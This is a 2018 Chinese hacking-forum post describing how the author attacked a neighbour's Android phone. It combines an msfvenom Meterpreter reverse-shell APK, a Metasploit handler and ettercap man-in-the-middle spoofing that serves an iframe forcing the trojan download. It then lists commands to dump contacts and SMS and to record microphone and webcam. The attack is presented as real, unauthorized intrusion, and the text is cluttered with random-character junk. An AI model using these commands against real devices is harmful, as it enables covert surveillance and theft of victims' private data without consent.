中国网络渗透测试联盟

标题: metasploit+ettercap中间人攻击成功入侵邻居手机 [打印本页]
作者: admin    时间: 2018-10-20 20:30
标题: metasploit+ettercap中间人攻击成功入侵邻居手机

5 k- L7 e0 i8 i. D 五、msf+ettercap入侵邻居安卓手机 5 b$ J& a0 j, G9 I& ?' d# ~

( x9 t, l- M( I; C$ v: @

: Q X. o( M8 w6 x/ i6 D 首先启动msf 1 A4 ?/ `* m# e8 P& |0 u

0 Y J' U, N @5 _

8 x* c, F! e" v+ [ 先用kali生成一个安卓木马,如下命令: ) h. ]# E: l% C

" L! [; K% @5 V: m3 ^, I

# f1 Z* `# i/ K# B# |6 i9 R Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 1 Y1 N0 ^) H+ u7 k

1 ]+ `. L G! u' }

- U w. B) h0 E) L 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 : ?" c4 R0 u0 j9 q9 x

, v6 [5 B5 E3 i6 z" P

% b8 m1 { t( K) ~0 Z' ] 然后进入msf ; c! m2 w' L: o9 |, V

, s3 t* n$ P8 Z; {; I7 g

- U: ^9 u( W& Z8 z$ s7 R use exploit/multi/handler 3 b. L L0 t+ \- X) j4 z0 v

; N- @5 o8 s& \! t/ H' e

/ D5 c b* B( i6 v( { set payload android/meterpreter/reverse_tcp 6 Z7 H9 b- c2 m9 a! ]% }

% {" g5 k* C, N

( r7 k3 \0 U; ~8 D$ z5 F$ p1 L$ K set LHOST 192.168.0.109 //ipkailiip % P4 M8 R% G" q9 F2 O

1 \8 v! H+ p' P7 { P" z1 c# C

8 Q& R5 t1 |7 e0 D$ c set LPORT 44444 //端口一定要与前面生成的木马的端口一致 9 `- f* @! q5 q6 q$ k3 @

/ k! e( [+ D. X) b7 x

$ O" W4 X$ s! A) Y Exploit / S6 u# C" x# h$ l( L

( X0 u1 H% x% w9 N4 p

1 i X, L8 Y: @   1 [( X/ l" K5 l; ~

0 {% x* H r0 W

0 H( W! B8 o/ y3 r+ ^- P" S/ k 下面我们开启ettercap -G . y# B% x5 o0 O1 i& a+ D$ j

: P Z- W) ]" j3 W# L6 C6 L- B4 G* v

6 S; @$ ]8 k ]- y7 j: { 我物理IP + u- J4 _# g2 P7 C

- b# ?0 X. p, M5 x- ^! e

% r, d. E7 O- y# g& Z3 Y   2 d& U0 o3 g, Q6 O: N C" @

' C, T9 Y. N0 Q, ?2 b4 d/ p, I+ s

0 D$ S4 C" H$ ]& r% [& h$ D 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, $ M- c4 g: l- t

9 n' L. Q( X' k9 ]0 f& C( j7 d. [7 h

, o+ r0 A) s5 w% W1 F) S$ |! c. B" _ 下面我们来设置一下 * s2 f- d5 x+ Q& x' U! F" B

4 O/ |# U! P- P

+ f3 \9 t- L4 W. S& R2 |   / W9 F$ g/ ~$ M1 ^- j: t4 e& l

% {1 C: g' P4 H* m

7 e5 _ b8 z, m Z5 B: v1 d2 R0 A3 [- Q 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 5 e* O# a& y" E5 A

1 z) Y# Q y* [) v W# Z- O

# ~+ R, D' u4 b   * z3 f3 M. m n: c2 E+ ^

, R0 V! B* h5 ~% q% [

% u2 z2 G" I& @# E3 i7 q4 R   2 k% A( [) T) M- D! M0 t& a

) k+ K* f; A; J& ~2 ?8 k$ |* Q

: ]8 {% {, [. ]! O/ R: z: F   2 A, ^* O: q3 K8 K% a* d! T6 a

( c: ?4 g' H8 y: R5 E

* R e: ?, m6 n+ E! ~0 M   1 u0 U! f6 `, ]: p3 ~" S

) z$ p9 M2 u! x1 o; a* p: r: t

& u+ {8 s" f- A8 T; R7 E- c6 \9 J   3 v4 G) a) z/ X+ h6 O

6 _* H5 T# a- k3 I, l' k& ~

# T u! O E1 w; d& {   ' X, v1 n: f) W) {) h4 A, Q

& ^: X' b3 F l& w; b6 n! f, _

; z' Q# T; G. f) s7 d   8 i2 j/ l6 e# b5 t' J1 `

% j& G$ K0 H6 r

; H L* r2 h% y+ Q1 l* u2 Q% ?% `   : L' d( B! U5 D2 W8 {

w! Y1 {: `+ R1 `- x

' S5 H( m. `' J" F+ i( T   " e4 f% R+ P4 o5 B* ~! z9 }

" n# i! O+ v+ Z% Y! I$ R0 r

5 F; y8 |9 {; l   : e: E, U) T& f

3 ]6 \( [5 l! M. S2 k* d

' E3 Z4 f C8 a8 U* E* h7 h% B   - x% _* m' Q$ ?% t; [. ^( a

6 G O* K8 t6 ~6 m+ ^- Z- c0 P

. D$ F; Y; S! P% X   + v5 @. `% {# H3 H4 y' b

6 F7 {6 e" g8 f( B8 j; ~# x0 P

" l G1 y. K9 R2 T3 F0 k) I   % j% g1 v. [2 o- k

# t' Y& X, q+ P6 P1 a' u, ^

4 `. \/ v, f9 R2 V4 G# z2 u! g# S 下面我们开始攻击 3 _1 p! h# W3 f2 @; _& V1 @4 R; @

4 j, d/ b, a% S( x9 F

. ` m) o# T, L2 q/ Y! ?% t   8 f/ ]! W( h- o k

5 Q$ g! K; O# m8 f1 \

' G" T W+ M- h& v! \9 G9 k Y   7 Q" \7 T- N8 F- B

& n/ k5 J& [% S# E

+ u* C" J4 L1 B* s* @/ x   ' V7 `, t* N) m

( R( c* S$ f f+ T

: E$ q! H% H% ^& a' \2 `3 i+ `   6 d; l' F/ ?2 C; p: m6 B3 S

8 ?0 a! B3 d2 t

, {: f3 K e3 q! |   . D9 d0 |# c# G

5 @7 C C! x* A. Z$ ?/ M0 t3 x

1 m+ `' n8 ?5 q- C; d8 y 大概过了5分钟多,发现反弹成功了 * }! k: }# @: a

) P; z. D: m/ x# r& o

6 U0 T5 R, p5 m# h) z7 m   6 y8 b4 Z5 h4 ]9 Q; m* i

2 V9 M' a" @: i7 N

7 T7 _% l( l! R; c, G+ y   , {4 @0 p6 h7 D! w5 u

% c, `2 F Q7 O' _+ i

( S' G& L- X8 M3 Y; t   2 t- Y; r4 A, I- Y: x

7 n- Y- Y7 g7 i8 A1 {2 ^' Q

+ L# t y8 D {- n   . c. d9 L; p9 s) w+ w9 y: v' u1 P, E

; ?2 R. N. K2 Z4 W( e

7 d/ [7 o B0 @. b7 F3 U% s: V   $ ~" n" K: V9 ~' G$ ~

0 n7 X6 j5 I9 X1 y9 u5 w* `( b/ z

" V: X# R* J. ?$ e   4 W5 {& ~0 i- Y0 g1 H- U

" o3 S1 N' S h% n( y! k2 R

& G/ D3 S: N& A6 K   9 N( G/ v7 s9 f& S

; E7 f% V9 }# q( |5 X" z, S- ]- S+ Y

2 g* r" a G1 J0 x, n) u$ ~ 执行命令 : y3 r; J7 Z; i/ E

$ m0 g% h$ j. z/ \% d1 R& ^8 S7 a

' Q% j- \5 \" z0 n   : x @! Q" `' w1 b

E6 p e- k) g7 `5 h

. b! H* L! x- ^8 G1 G+ E0 s; \& ] dump_contacts    --》这个是导出电话 ! n, k0 c9 F7 d! ~

' Y/ V4 m5 U. T* O& i7 r: `

% c3 S. u1 f! F: ?& [ dump_sms --》这个是导出信息 4 _* X @# T' O" y" i- X

" u7 s8 Z J7 ^$ Y" n" V

# r% b2 l$ ]& S2 ~% F7 I- o record_mic     Record audio from the default microphone for X seconds ; C% z6 Y) T4 E Y% L; S: t

- d' X: ?( f7 l. P8 M4 V" s. b h

6 }6 Z8 }2 y: u& l" T: C$ |/ s8 F     webcam_chat    Start a video chat R! d4 R4 O, m. D

! u+ \3 G& Z% G1 `2 V

3 J6 p! S- F& I5 i     webcam_list    List webcams . K' J7 } s) k" K; x" A" M

' }: P: u& d) e9 |" ]9 H

8 O& @8 Y; X: k6 I     webcam_snap    Take a snapshot from the specified webcam - U$ }- G, m) f$ z3 {

! f" F; E; z: D: m* j: {! R1 w

$ ~! R# s# Y$ [/ `7 _' d/ O4 I webcam_stream  lay a video stream from the specified webcam 8 L0 C: M" W7 _) N5 M7 J9 M

6 H# O2 N: I$ Z- _5 [( ~. W2 S6 ?

. g9 J3 w2 `$ U/ d) [7 f   ; D1 {2 q/ I& }

- {/ u% l/ [& |0 e u( J

& J+ ^' w: `" O5 J U   / m8 z. ?" `7 m( f

9 s! c, a" B+ {* N* i6 b

) `7 ?8 }7 E+ k) ^8 \9 f# j/ [ 我们打开看一下电话薄, ! S$ c1 m0 u$ q; o7 x! y) \

# B$ _0 d$ B. g7 n0 {

) s8 E( I$ {9 G   % t2 D+ o, v0 z

# @$ \& h1 H1 v* C

1 l) F7 B0 G1 C8 s8 S   0 ^6 n- M( w% V+ Z* T1 m9 X) h1 M9 j

. T) V: f c7 C

8 Z" a7 L% ?6 c9 Q( R" g: N% M   ( o9 M$ Y. z6 Y) j* z9 [. ]; V

- h' `( f6 h9 B/ u, A# H3 P

5 \7 A/ R, a* {& L, j+ N! u; S   # R8 \( s5 T1 P. m/ J) q% ^

2 l7 ?: U; a' L7 |5 {! K7 r8 c

2 o S+ K+ U# F! i   ) U5 Q+ B1 [( ~2 r

- t3 U+ |2 T5 Y! ?0 _

8 H: v1 z2 j7 `9 L( \- u* h+ c   # B' @. Q6 Q2 }0 F& Z9 v5 O+ ?

- d0 P" L, |- Q8 n5 Z

6 r. y: |* l3 P- ?: \/ @ 我们同时欺骗成DroidJack木马,使用方法如图: ) z: C5 v1 R8 e4 k) g$ _: ]

& e9 r9 B" O; s+ Z2 P* _

: d a: ?- C' q( [   $ v% e( a- x \

9 I' {" H$ h' E) d/ v% y

3 I( P, ]" h* s, f   # U0 k* S4 c$ W. Y1 h+ G

+ k( I6 y2 J! X- e, w7 }" _+ Q

3 b4 x8 r) I* f" t9 D& V0 _$ u   # J, b1 h$ p2 H. X! k

8 k% a4 r3 C0 U1 e' U1 s5 a! ~

4 A: R, M8 e2 q' @% G 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 ! W5 N" S; i t/ H& t* y

) O+ ~: \! J. Z3 L8 C* {

7 K8 a6 L) I6 z5 x& M   : k; ]5 Z4 y, b: @: ^

: b* U# ]9 K O3 a: o

. Y5 n* ~8 T S% l   , p8 N5 g) V- A8 W

; G8 D& c+ T' B) i- {

# j. B4 ]! ?# t/ A) k7 \$ f   5 x3 e* W# a- Y6 _( V/ E) J

8 e' @ l! b5 a; `( o( B

' a) g1 b; M) v! F7 z & ^' ^# m K, K- k( M& C$ C; i

: H0 l) Z/ v, }; e+ k: F8 q& j

& j* F! {: p/ S) g
: o# j0 H+ o6 v( b. k





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2